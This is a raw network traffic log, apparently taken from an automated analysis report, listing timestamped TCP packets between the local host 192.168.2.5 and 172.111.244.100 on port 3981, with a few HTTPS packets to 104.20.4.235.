                                                    Oct 7, 2024 07:09:29.514096022 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.514112949 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.514126062 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.514133930 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.514166117 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.517481089 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517514944 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517540932 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517541885 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.517556906 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517573118 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517587900 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517604113 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.517605066 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517621040 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517625093 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.517641068 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517642975 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.517693996 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517700911 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.517710924 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517725945 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517741919 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517770052 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.517795086 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.517827034 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517842054 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.517889023 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.517896891 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523329973 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523350954 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523376942 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523402929 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.523413897 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523430109 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.523432016 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523468971 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523483038 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523499012 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523514986 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.523525000 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523539066 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523551941 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.523555994 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523572922 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.523607969 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.523688078 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523703098 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523720026 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523734093 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523750067 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523752928 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.523791075 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.523873091 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523890972 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523905993 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.523924112 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.523953915 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.528496981 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.528851032 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.528884888 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.528901100 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.528912067 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.528918028 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.528935909 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.528950930 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.528965950 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.528975964 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.528983116 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.529001951 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.529016972 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.529017925 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.529033899 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.529048920 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.529062033 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.529066086 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.529082060 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.529083014 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.529102087 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.529112101 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.529153109 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.533548117 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.533571959 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.533591032 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.533616066 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.533632994 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.533647060 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.533658028 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.533674955 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.533679008 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.533691883 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.533695936 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.533710003 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.533724070 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.533740997 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.533741951 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.533803940 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.538392067 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.538414955 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.538484097 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.538736105 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.538767099 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.538798094 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.543520927 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.543540955 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.543601990 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.543656111 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.543673992 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.543689966 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.543711901 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.543817043 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.548562050 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.548593044 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.548609018 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.548624992 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.548650980 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.548682928 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.571400881 CEST49813443192.168.2.5104.20.4.235
                                                    Oct 7, 2024 07:09:29.571435928 CEST44349813104.20.4.235192.168.2.5
                                                    Oct 7, 2024 07:09:29.571527958 CEST49813443192.168.2.5104.20.4.235
                                                    Oct 7, 2024 07:09:29.574939966 CEST49813443192.168.2.5104.20.4.235
                                                    Oct 7, 2024 07:09:29.574950933 CEST44349813104.20.4.235192.168.2.5
                                                    Oct 7, 2024 07:09:29.587269068 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.587352991 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.587551117 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.591936111 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.591964006 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.592154026 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.592415094 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.592438936 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.592454910 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.592498064 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.596812010 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.596868992 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.598022938 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.601579905 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.601594925 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.601636887 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.606384039 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.606450081 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.606465101 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.606491089 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.606528997 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.606591940 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.606610060 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.606699944 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.611138105 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.611155987 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.611170053 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.611238956 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.611551046 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.611567020 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.611613989 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.615925074 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.615941048 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.615953922 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.615982056 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.616008043 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.616468906 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.616485119 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.616543055 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.620739937 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.620755911 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.620778084 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.620820999 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.621252060 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.621277094 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.621301889 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.625502110 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.625519991 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.625555038 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.626136065 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.626152992 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.626164913 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.626214027 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.630280972 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.630316973 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.630331039 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.630367994 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.631014109 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.631042004 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.631056070 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.631073952 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.631103992 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.635010004 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.635027885 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.635041952 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.635088921 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.635936022 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.635961056 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.635989904 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.639759064 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.639775991 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.639816999 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.640742064 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.640758991 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.640795946 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.644633055 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.644651890 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.644686937 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.645545959 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.645562887 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.645596981 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.645601034 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.645612001 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.645642996 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.649487972 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.649504900 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.649518967 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.649552107 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.649583101 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.650269032 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.650286913 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.650393009 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.654263973 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.654289007 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.654308081 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.654345989 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.655025959 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.655042887 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.655142069 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.659080982 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.659101963 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.659130096 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.659141064 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.659192085 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.659784079 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.659805059 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.659857035 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.663875103 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.663908005 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.663923025 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.664010048 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.664489985 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.664525986 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.664554119 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.668620110 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.668637037 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.668652058 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.668682098 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.668713093 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.669209003 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.669225931 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.669277906 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.673413992 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.673429012 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.673492908 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.673969030 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.673986912 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.674043894 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.678175926 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.678194046 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.678209066 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.678256035 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.678762913 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.678780079 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.678818941 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.682944059 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.682960987 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.682987928 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.683535099 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.683551073 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.683566093 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.683578968 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.683603048 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.687716961 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.687732935 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.687746048 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.687797070 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.688251972 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.688268900 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.688282967 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.688308001 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.688325882 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.692466974 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.692483902 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.692576885 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.692960024 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.692976952 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.692990065 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.693065882 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.697308064 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.697361946 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.697689056 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.697710037 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.697726965 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.697743893 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.697766066 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.697798014 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.702122927 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.702368975 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.702385902 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.702398062 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.702431917 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.702461958 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.702522993 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.702539921 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.702589989 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.707084894 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.707102060 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.707114935 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.707130909 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.707165003 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.707197905 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.707261086 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.707278013 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.707324982 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.711810112 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.711826086 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.711886883 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.711992025 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.712016106 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.712061882 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.712061882 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.716543913 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.716561079 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.716595888 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.716705084 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.716721058 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.716752052 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.721318960 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.721335888 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.721349001 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.721368074 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.721404076 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.721416950 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.721420050 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.721436024 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.721466064 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.726064920 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.726080894 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.726114035 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.726134062 CEST398149801172.111.244.100192.168.2.5
